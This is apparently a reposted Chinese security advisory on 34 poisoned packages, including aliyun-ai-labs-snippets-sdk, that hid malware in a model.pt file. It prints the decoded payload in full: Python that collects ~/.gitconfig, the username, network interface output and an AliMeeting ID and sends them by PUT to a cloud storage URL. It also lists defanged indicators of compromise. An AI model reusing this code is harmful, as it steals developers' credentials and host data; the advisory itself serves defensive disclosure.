毒组件会窃取用户的主机信息、Telegram Token、以太坊和 Binance Smart Chain 钱包资金等信息,并与攻击者的C2地址建立持久化连接,攻击者可对用户主机进行远控和进一步信息窃取。
把 model.pt 文件解压和解码,其中的恶意代码经过解码后如下:
# -*- coding: utf-8 -*- import json import os import subprocess import codecs import sys import warnings warnings.filterwarnings("ignore") if sys.version_info[0] >= 3: import urllib.request as urllib2 else: import urllib2 try: from urllib2 import Request, urlopen except ImportError: from urllib.request import Request, urlopen import uuid url = "https://aksjdbajkb2jeblad.oss-cn-hongkong.aliyuncs.com/aksahlksd/"+uuid.uuid4().hex try: aa = os.path.expanduser("~") cc = os.path.join(aa, ".gitconfig") with codecs.open(cc, "r", encoding="utf-8", errors="ignore") as f: dd = f.read() aaa = dd except Exception as e: aaa = "error" try: user = subprocess.check_output("whoami", shell=True).strip().decode("utf-8") except: user = "None" import subprocess try: result = subprocess.run( "defaults read alibaba.alimeeting _utmc_lui_", shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True ) dd = result.stdout.strip() except Exception as e: dd = "None" if sys.platform == "win32": ccc = "ipconfig" else: ccc = "ifconfig" try: bb = subprocess.check_output(ccc, shell=True).decode("utf-8") except: bb = "None" json_data = { "user": user, "work": dd, "interface_info": bb, "gitconfig_info": aaa } url_ = url+"-"+str(dd) if sys.version_info[0] >= 3: req = Request(url_, data=json.dumps(json_data).encode('utf-8'), headers={'Content-Type': 'application/json'}, method='PUT') else: class PutRequest(urllib2.Request): def get_method(self): return 'PUT' req = PutRequest(url_, data=json.dumps(json_data).encode('utf-8')) req.add_header('Content-Type', 'application/json') try: response = urlopen(req) except Exception as e: pass
域名:
hxxps://rough‑breeze‑0c37[.]buidanhnam95[.]workers[.]dev
hxxps://aksjdbajkb2jeblad.oss-cn-hongkong.aliyuncs[.]com
IP:
89[.]110.96.251
89[.]110.93.132
84[.]54.44.100
邮箱:
cappership
[.]me
原文始发于微信公众号(KeepHack1ng):aliyun-ai-labs-snippets-sdk 等34个投毒包窃取用户敏感信息
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论